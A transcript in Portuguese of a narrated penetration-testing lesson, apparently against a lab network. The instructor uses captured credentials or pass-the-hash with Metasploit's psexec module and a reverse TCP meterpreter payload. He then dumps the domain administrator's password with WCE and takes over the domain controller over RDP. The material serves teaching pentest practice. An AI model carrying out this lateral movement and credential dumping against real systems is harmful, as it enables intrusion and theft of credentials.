127 barra V, né, no caso aqui, 127.0.0.1. Ah, ele está pedindo senha, eu não tenho a senha, ele nem conseguiu abrir para mim. Mas ele já trouxe algumas informações aqui, ó, srvint, que é o nome dessa máquina. Essa máquina então chama SRV20. A gente viu que ela tem a porta 139, tem a porta 445, tem a porta 3389 aberta. Eu poderia ainda fazer uma enumeração nesse servidor, passando outra porta aqui, por exemplo, a 445. Ó, mandei isso localmente para minha máquina. E aqui eu poderia smb client -Lzão 127.0.0.1. Ó, interessante. Aqui é só para a gente fazer a numeração do servidor que a gente está trabalhando. Ó. A gente consegue descobrir, no caso, que servidor se trata. São informações interessantes. Então a gente já sabe que 172.16.160 ele é um Windows Server 2008 R2. O nome dele é srvint e ele é um domínio de rede aqui que é gbusiness. gbusiness.rede. Tem essas portas abertas aqui. Mas a gente não tem usuário e senha válidos para esse servidor, né? E aí existe, aqui no Metasploit, vou dar um background novamente, um módulo chamado psexec. Não só do Metasploit, mas você poderia usar isso com o próprio psexec.ez do Windows. Tem, né, um pacote que você baixa no Microsoft lá, você pode utilizar o psexec para fazer esse tipo de conexão utilizando credenciais válidas. Então, se você conseguir alguma credencial válida no sistema, você pode usar essas credenciais para se autenticar num determinado servidor. Então, vou pôr aqui psexec para a gente buscar. E olha, ele tem vários módulos envolvendo psexec. E ele tem um interessante aqui, que é um exploit para Windows smb psexec. Vamos utilizar ele então. Vou copiar aqui. Use show options. E olha o que ele pede, ó, o rhost. Então set rhost. Qual que é o rhost? 172.16.1.60. Qual que é a porta? 445 mesmo. Aí ele pede o domínio. Qual que é o domínio? gbusiness. Qual que é o usuário e senha? Bom, a gente não sabe exatamente qual é o usuário e senha, mas lembra que um pouco aqui acima, né? Vou voltar aqui nas informações que a gente estava coletando. A gente descobriu aqui o usuário Rogério, ó, ele está autenticado via gbusiness e a senha dele é roger@10. A gente pode utilizar essas credenciais que a gente encontrou aqui do Rogério para tentar se autenticar nesse servidor. Então, set smb user Rogério, set smb pass. Posso passar a senha dele assim, ó, roger@10. Ah, eu não consegui quebrar a senha do Roger. Não consegui quebrar essa senha aqui. Não consegui descobrir essa senha utilizando as técnicas que eu mostrei aqui ou utilizando o John, quebrando o hash dele aqui. Aí você pode simplesmente pegar o hash inteiro, né, ou o hash aqui inteiro que a gente tem e tentar passar ele aqui, porque ele aceita também o hash. Tá? Aí a gente estaria fazendo a técnica de pass the hash. Depois que eu fizer isso, eu seleciono o meu payload. Qual que vai ser o payload? Windows. Opa. Interpreter. Reverse. TCP. Eu gosto de conexão reversa, né? Deu para perceber. Show options. Set lport. Vou utilizar a porta 7000 agora. Set lhost. Agora eu preciso passar meu endereço IP. Meu endereço IP. Acho que eu tenho ele salvo aqui, né?
em algum lugar. Não tem. Meu IP. Vou copiar o endereço IP aqui. Vou passar meu endereço de IP aqui então. Show Options. Então, só recapitulando, a gente vai utilizar então esse exploit aqui agora, que na verdade é o PSExec, vou até colocar aqui, e utilizar as credenciais aqui do Rogério para tentar se autenticar nesse servidor aí. Vou dar um exploit. E ele falhou aqui, ó, o rhost, ele não conseguiu achar o rhost. Ah, eu setei o rhost errado, o rhost ficou como gbusiness. Então set rhost 172.16.1.60 set smb domain, aí sim é o gbusiness. Uma confusão minha aí. Show options. Agora sim, ó, o IP está setado corretamente e o domínio também está setado corretamente. Aqui a gente pode executar o exploit. Ele está enviando o payload. Vamos aguardar para ver se ele consegue fazer a conexão. Enviando o segundo estágio aqui e ó, outra sessão aberta. Vou dar um help aqui, ó, já tem uns comandos aí que a gente pode utilizar para esse servidor. Vou dar o ipconfig aqui também. E olha agora, ó, agora a gente está dentro desse servidor aqui, 172.16.1.60, que é o servidor aí principal, que é o servidor de domínio dessa rede. Mais uma vez, eu poderia fazer o upload agora do WCE para tentar pegar as credenciais. Então, share WCE 64 bits. Vou copiar isso para dentro de C2 pontos. Ele está fazendo upload. Terminou o upload. Vou dar um shell. Estou aqui dentro do server 2008. Vou voltar aqui para a raiz, dar um dir. Ó, o WC 64 bits está aqui. Vou executar ele então. WC 64 bits.ez menos W. E aqui ele traz, ó, usuário autenticado nesse servidor, no caso administrator, no gbusiness e a senha dele. Vou salvar aqui. E basicamente agora a gente já tem a senha de administrador desse servidor. Vou dar um exit aqui para sair. Dar um netstat aqui, né? Beleza, estamos com a porta ainda 3389 aberta aqui. E agora a gente pode utilizar as credenciais que a gente conseguiu no servidor usando o WCE xfreeRDP para logar nesse TS. Então, /u administrator, /d aqui que é o domínio, gbusiness, /w aqui é o tamanho da tela aqui, 800 por 600, eu vou colocar, /v, /v, e aí eu coloco o IP local porque a gente já encaminhou essa porta, certo? Ao fazer isso, ele vai pedir a senha, vou digitar a senha aqui. E ele abre aqui a tela com acesso administrativo aqui a esse servidor, né? Ó, posso gerenciar o Active, o AD como administrador, ó, do grupo gbusiness.rede. Posso acessar qualquer coisa e tenho recurso full nesse servidor, ó, as configurações do servidor. Se eu abrir aqui as pastas dele aqui de dados, ó, todos os setores. Então, nesse momento aqui eu ganhei acesso completo
a esse servidor. E é isso aí, pessoal. Então, basicamente a gente conseguiu ver aí como que a gente faz como que a gente trabalha toda a condução de um pen test e vai guardando essas informações em um arquivo de texto, guardando a informação da tela ali, para posteriormente a gente utilizar isso para gerar o relatório. Até mais, pessoal!